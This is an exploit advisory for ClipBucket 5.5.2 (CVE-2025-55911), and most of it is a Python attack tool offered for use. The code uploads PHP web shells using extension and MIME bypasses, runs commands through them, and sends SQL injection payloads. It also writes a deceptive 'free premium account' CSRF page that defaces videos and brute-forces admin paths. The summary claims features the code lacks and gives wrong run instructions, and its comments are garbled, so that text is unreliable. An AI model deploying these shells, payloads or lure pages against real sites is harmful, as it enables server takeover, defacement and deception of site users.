ClipBucket 5.5.2 Build 90 Practical Exploitation Tool

ClipBucket 5.5.2 Build 90 suffers from a critical authenticated Remote ClipBucket 5.5.2 Build 90 suffers from a critical authenticated Remote Code Execution (RCE) vulnerability.

This flaw allows an attacker with administrative or moderator privileges to upload arbitrary malicious files. Practical exploitation involves crafting a specially designed ZIP archive containing a PHP web shell.

This ZIP is then uploaded through the "plugin upload" feature, which often lacks proper validation for file types within the archive. Upon successful upload and extraction by the server, the PHP shell is placed in an accessible directory.

The attacker can then navigate directly to the shell's URL, gaining full control over the web server. This enables arbitrary command execution, data theft, defacement, and potential system compromise. Mitigation requires immediate upgrading to a patched version and implementing strong access controls.

=============================================================================================================================================
| # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/MacWarrior/clipbucket-v5/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911

[+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities

1. Advanced RCE (Remote Code Execution)

Multiple PHP shell payloads (c99, WSO-style, reverse shell)

Bypass techniques: Double extensions, null byte injection, MIME type spoofing

Smart detection: Automatic shell validation and access level assessment

Post-exploitation: Auto-commands for system enumeration

2. File Upload Exploitation

6 different payload types with various obfuscation methods

Multiple upload endpoints: Standard, AJAX, action-based

Response analysis: Smart parsing of upload responses to locate shells

Success verification: Automated shell testing with command execution

3. SQL Injection Attacks

Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi

Data extraction: Automatic database/table/column enumeration

Detailed reporting: Complete payload analysis and exploitation examples

Multi-endpoint testing: Tests multiple potential injection points

4. Additional Attack Vectors

LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers

Directory brute-forcing: 20-thread concurrent scanning for hidden paths

CSRF exploitation: Attack vector identification and PoC generation

Admin panel discovery: Common ClipBucket admin paths

[+] Usage : * : Save this file as: exploit.php
Run: php exploit.php

[+] POC :

#!/usr/bin/env python3
"""
ClipBucket Practical Exploitation Tool

"""
import requests
import json
import time
import random
import os
import sys
import re
import urllib3
from urllib.parse import urlparse

# ????? ??????? SSL
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class ClipBucketExploiter:
def __init__(self, target_url):
self.target = target_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.session.timeout = 10

# ????? headers
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest'
})

self.vulnerabilities = []
self.shell_urls = []

def print_status(self, message, status="info"):
"""????? ????? ?????? ???????"""
colors = {
"info": "\033[96m", # ???? ?????
"success": "\033[92m", # ????
"warning": "\033[93m", # ????
"error": "\033[91m", # ????
"critical": "\033[95m" # ??????
}
color = colors.get(status, "\033[97m")
print(f"{color}[{status.upper()}] {message}\033[0m")

def check_clipbucket(self):
"""?????? ??? ??? ??? ?????? ?????? ClipBucket"""
self.print_status("Checking if website uses ClipBucket...", "info")

try:
# ??? ?????? ????????
resp = self.session.get(self.target)

# ?????? ClipBucket
indicators = [
'clipbucket', 'CB', 'upload.php', 'video_upload',
'action=upload', 'file_uploader', 'video-upload',
'videobb', 'my_videos', 'video_manager'
]

found = []
for indicator in indicators:
if indicator.lower() in resp.text.lower():
found.append(indicator)

if found:
self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success")

# ??? upload.php ??????
upload_test = f"{self.target}/upload.php"
try:
upload_resp = self.session.get(upload_test, timeout=5)
if upload_resp.status_code == 200:
self.print_status("upload.php is accessible!", "success")
return True
else:
self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning")
except:
self.print_status("upload.php is not accessible", "warning")

return True
else:
self.print_status("No clear ClipBucket indicators found", "warning")
return False

except Exception as e:
self.print_status(f"Connection error: {str(e)}", "error")
return False

def test_upload_endpoint(self):
"""?????? ???? ??? ???????"""
self.print_status("Testing upload.php endpoint...", "info")

upload_url = f"{self.target}/upload.php"

# ?????? HEAD ?????
try:
head_resp = self.session.head(upload_url, timeout=5)
self.print_status(f"HEAD request: Status {head_resp.status_code}", "info")
except:
pass

# ?????? GET
try:
get_resp = self.session.get(upload_url, timeout=5)
self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info")

# ????? ?? ?????? ????? ?????
if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower():
self.print_status("Upload form detected", "success")
return True
else:
self.print_status("No upload form detected in response", "warning")
return False

except Exception as e:
self.print_status(f"Error testing upload endpoint: {str(e)}", "error")
return False

def exploit_file_upload(self):
"""??????? ???? ??? ???????"""
self.print_status("Attempting file upload exploitation...", "info")

# ???????? ??????
payloads = [
{
'filename': 'test.php',
'content': b'<?php echo "VULNERABLE"; ?>',
'mime': 'application/x-php'
},
{
'filename': 'shell.php.gif',
'content': b'GIF89a<?php system($_GET["cmd"]); ?>',
'mime': 'image/gif'
},
{
'filename': 'exploit.mp4.php',
'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom<?php echo shell_exec($_GET["c"]); ?>',
'mime': 'video/mp4'
}
]

for payload in payloads:
self.print_status(f"Trying payload: {payload['filename']}", "info")

files = {
'Filedata': (payload['filename'], payload['content'], payload['mime'])
}

data = {
'title': 'Test Video Upload',
'collection_id': '1'
}

try:
response = self.session.post(f"{self.target}/upload.php",
files=files,
data=data,
timeout=15)

self.print_status(f"Response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:200]}", "info")

# ????? ????
if response.status_code == 200:
# ????? ?? ?????? ??????
success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes']
for keyword in success_keywords:
if keyword in response.text.lower():
self.print_status(f"Upload successful! Keyword '{keyword}' found", "success")

# ?????? ??????? ??? ?????
filename = self.extract_filename(response.text)
if filename:
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"Potential shell: {shell_url}", "critical")

# ?????? ????
self.test_shell_access(shell_url, payload['filename'])
return True

# ????? JSON
try:
json_data = json.loads(response.text)
if 'file_name' in json_data:
filename = json_data['file_name']
shell_url = f"{self.target}/temp/{filename}"
self.shell_urls.append(shell_url)
self.print_status(f"JSON response - Shell: {shell_url}", "critical")
return True
except:
pass

except Exception as e:
self.print_status(f"Upload error: {str(e)}", "error")

return False

def extract_filename(self, response_text):
"""??????? ??? ????? ?? ????"""
patterns = [
r'"file_name"\s*:\s*"([^"]+)"',
r"'file_name'\s*:\s*'([^']+)'",
r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)',
r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)'
]

for pattern in patterns:
matches = re.findall(pattern, response_text)
if matches:
filename = matches[0]
# ????? ?????? ??? ?? ??? ???????
if '.' not in filename:
filename += '.mp4'
return filename

return None

def test_shell_access(self, shell_url, original_filename):
"""?????? ?????? ??? ????"""
self.print_status(f"Testing shell access: {shell_url}", "info")

# ???? ??? ??? ?????
if '.php' in original_filename.lower():
# ?????? PHP shell
test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST"
try:
response = self.session.get(test_url, timeout=10)
if 'CLIPBUCKET_TEST' in response.text:
self.print_status("PHP shell is ACTIVE!", "success")

# ??? ??????? ??????
info_url = f"{shell_url}?cmd=whoami && pwd"
info_response = self.session.get(info_url, timeout=10)
self.print_status(f"System info: {info_response.text[:100]}", "success")

# ??? ???? ????
with open('shells_found.txt', 'a') as f:
f.write(f"{shell_url}\n")
f.write(f"Test command: {shell_url}?cmd=whoami\n")
f.write(f"Response: {info_response.text[:200]}\n\n")

return True
except:
pass

# ?????? ?????? ???????
try:
direct_response = self.session.get(shell_url, timeout=10)
if direct_response.status_code == 200:
self.print_status(f"File is accessible (status: {direct_response.status_code})", "success")
return True
except:
pass

self.print_status("Shell access test failed", "warning")
return False

def exploit_csrf(self):
"""??????? ???? CSRF"""
self.print_status("Testing for CSRF vulnerability...", "info")

test_data = {
'updateVideo': '1',
'videoid': '99999', # ID ???? ????? ??????? ??? ???????? ??????
'title': 'CSRF Security Test',
'desc': 'This is a security test for CSRF vulnerability',
'tags': 'test,security,csrf'
}

try:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)

self.print_status(f"CSRF test response status: {response.status_code}", "info")
self.print_status(f"Response preview: {response.text[:150]}", "info")

if response.status_code == 200:
if 'valid' in response.text.lower() or 'success' in response.text.lower():
self.print_status("CSRF vulnerability CONFIRMED!", "success")
self.vulnerabilities.append('CSRF')

# ????? ???? ???????
self.create_csrf_exploit_page()
return True
else:
self.print_status("CSRF protection might be enabled", "warning")

except Exception as e:
self.print_status(f"CSRF test error: {str(e)}", "error")

return False

def create_csrf_exploit_page(self):
"""????? ???? ??????? CSRF"""
exploit_html = f'''<!DOCTYPE html>
<html>
<head>
<title>Free Premium Access</title>
<style>
body {{
font-family: Arial, sans-serif;
text-align: center;
padding: 50px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
}}
.container {{
background: rgba(255,255,255,0.1);
padding: 30px;
border-radius: 15px;
backdrop-filter: blur(10px);
max-width: 600px;
margin: 0 auto;
}}
button {{
background: #4CAF50;
color: white;
padding: 15px 30px;
border: none;
border-radius: 8px;
font-size: 18px;
cursor: pointer;
margin: 20px;
}}
button:hover {{
background: #45a049;
}}
</style>
</head>
<body>
<div class="container">
<h1> Claim Your Free Premium Account!</h1>
<p>Click the button below to activate premium features</p>

<form id="attack" action="{self.target}/upload.php" method="POST" style="display:none;">
<input type="hidden" name="updateVideo" value="1">
<input type="hidden" name="videoid" value="1">
<input type="hidden" name="title" value="ACCOUNT HACKED">
<input type="hidden" name="desc" value="This account was compromised via CSRF">
<input type="hidden" name="tags" value="hacked">
</form>

<button onclick="launchAttack()">
ACTIVATE NOW
</button>

<script>
function launchAttack() {{
document.getElementById('attack').submit();
alert('Premium activated!');
}}

// Auto-attack after 5 seconds
setTimeout(launchAttack, 5000);
</script>
</div>
</body>
</html>'''

with open('csrf_attack.html', 'w', encoding='utf-8') as f:
f.write(exploit_html)

self.print_status("CSRF exploit page created: csrf_attack.html", "success")

def test_sqli(self):
"""?????? ???? SQL Injection"""
self.print_status("Testing for SQL Injection...", "info")

test_payloads = [
("1' OR '1'='1", "Basic boolean"),
("1' AND SLEEP(5)--", "Time-based"),
("1' UNION SELECT NULL,version()--", "Union injection")
]

for payload, description in test_payloads:
self.print_status(f"Testing: {description}", "info")

test_data = {
'getForm': '1',
'vid': payload,
'objId': 'test',
'title': 'SQLi Test'
}

try:
if 'SLEEP' in payload:
start_time = time.time()
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15)
elapsed = time.time() - start_time

if elapsed > 4:
self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success")
self.vulnerabilities.append('SQL Injection (Time-based)')
return True
else:
response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10)

error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database']
for indicator in error_indicators:
if indicator.lower() in response.text.lower():
self.print_status(f"Error-based SQLi detected: {indicator}", "success")
self.vulnerabilities.append('SQL Injection (Error-based)')

with open('sqli_evidence.txt', 'w') as f:
f.write(f"Payload: {payload}\n")
f.write(f"Response:\n{response.text}\n")

return True

except Exception as e:
self.print_status(f"SQLi test error: {str(e)}", "error")

self.print_status("No SQL injection vulnerability detected", "warning")
return False

def find_admin_panel(self):
"""????? ?? ???? ??????"""
self.print_status("Searching for admin panel...", "info")

common_paths = [
'/admin',
'/admin_area',
'/administrator',
'/admin.php',
'/admin/login.php',
'/admin/index.php',
'/dashboard',
'/controlpanel',
'/cp',
'/admincp',
'/cb_admin',
'/clipbucket_admin',
'/admin_dashboard',
'/manage',
'/manager'
]

found_panels = []

for path in common_paths:
url = f"{self.target}{path}"
try:
# ??? HEAD ????? (????)
head_resp = self.session.head(url, timeout=3, allow_redirects=False)

if head_resp.status_code < 400:
# ??? GET ?????? ?? ???????
get_resp = self.session.get(url, timeout=5)

# ???? ?? ?? ?????? ????? ??? ?????? ???? ????
if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']):
self.print_status(f"Admin panel found: {url}", "success")
found_panels.append(url)

# ??? ??????? ?????
with open('admin_panel_found.txt', 'a') as f:
f.write(f"URL: {url}\n")
f.write(f"Status: {get_resp.status_code}\n")
f.write(f"Size: {len(get_resp.text)} chars\n")
f.write("-" * 50 + "\n")

except:
continue

if found_panels:
self.print_status(f"Found {len(found_panels)} admin panels", "success")
return found_panels
else:
self.print_status("No admin panels found", "warning")
return []

def scan_directories(self):
"""??? ??????? ??????"""
self.print_status("Scanning for important directories...", "info")

directories = [
'/uploads',
'/upload',
'/files',
'/temp',
'/tmp',
'/logs',
'/backup',
'/backups',
'/data',
'/database',
'/config',
'/includes',
'/install',
'/upgrade',
'/assets',
'/images',
'/videos',
'/media'
]

found_dirs = []

for directory in directories:
url = f"{self.target}{directory}"
try:
response = self.session.head(url, timeout=3)
if response.status_code < 400:
self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success")
found_dirs.append(url)
except:
pass

return found_dirs

def generate_report(self):
"""????? ????? ???????"""
self.print_status("\n" + "="*60, "info")
self.print_status("EXPLOITATION REPORT", "critical")
self.print_status("="*60, "info")

report = []
report.append(f"Target: {self.target}")
report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}")
report.append("")

# ??????? ????????
if self.vulnerabilities or self.shell_urls:
report.append("VULNERABILITIES FOUND:")
report.append("-" * 40)

for vuln in self.vulnerabilities:
report.append(f"? {vuln}")

if self.shell_urls:
report.append(f"? Remote Code Execution: {len(self.shell_urls)} shells deployed")
for i, shell in enumerate(self.shell_urls, 1):
report.append(f" Shell {i}: {shell}")

report.append("")

# ????????
report.append("RECOMMENDATIONS:")
report.append("-" * 40)
if 'CSRF' in self.vulnerabilities:
report.append("? Implement CSRF tokens on all forms")
if 'SQL Injection' in ' '.join(self.vulnerabilities):
report.append("? Use prepared statements for database queries")
if self.shell_urls:
report.append("? Implement strict file upload validation")
report.append("? Disable PHP execution in upload directories")

else:
report.append("No critical vulnerabilities found")

report.append("")
report.append("FILES GENERATED:")
report.append("-" * 40)

# ??? ??????? ???????
files_to_check = ['shells_found.txt', 'csrf_attack.html',
'admin_panel_found.txt', 'sqli_evidence.txt']

for file in files_to_check:
if os.path.exists(file):
report.append(f"? {file}")

# ????? ???????
report_text = "\n".join(report)
print("\n" + report_text)

with open('exploitation_report.txt', 'w', encoding='utf-8') as f:
f.write(report_text)

self.print_status("\nReport saved to: exploitation_report.txt", "success")

def run_complete_scan(self):
"""????? ??? ????"""
self.print_status("Starting complete ClipBucket vulnerability scan...", "info")

# ?????? 1: ?????? ?? ClipBucket
if not self.check_clipbucket():
self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error")
return

# ?????? 2: ?????? upload.php
if not self.test_upload_endpoint():
self.print_status("upload.php not functioning properly", "warning")

# ?????? 3: ??????? ??? ???????
self.exploit_file_upload()

# ?????? 4: ?????? CSRF
self.exploit_csrf()

# ?????? 5: ?????? SQL Injection
self.test_sqli()

# ?????? 6: ????? ?? ???? ??????
self.find_admin_panel()

# ?????? 7: ??? ???????
self.scan_directories()

# ?????? 8: ??????? ???????
self.generate_report()

def main():
"""?????? ????????"""
print("\033[95m" + """
????????????????????????????????????????????????????????
? ClipBucket Exploitation Scanner ?
? By indoushka ?
????????????????????????????????????????????????????????
""" + "\033[0m")

if len(sys.argv) < 2:
print("Usage:")
print(f" python {sys.argv[0]} <target_url>")
print("\nExamples:")
print(f" python {sys.argv[0]} https://example.com")
print(f" python {sys.argv[0]} http://192.168.1.100")
print(f" python {sys.argv[0]} http://localhost/clipbucket")
return

target = sys.argv[1]

# ????? http:// ??? ?? ??? ???????
if not target.startswith(('http://', 'https://')):
target = 'http://' + target

# ????? ???????? ??????
exploiter = ClipBucketExploiter(target)

try:
exploiter.run_complete_scan()
except KeyboardInterrupt:
print("\n\nScan interrupted by user")
except Exception as e:
print(f"\nError during scan: {str(e)}")

if __name__ == "__main__":
main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================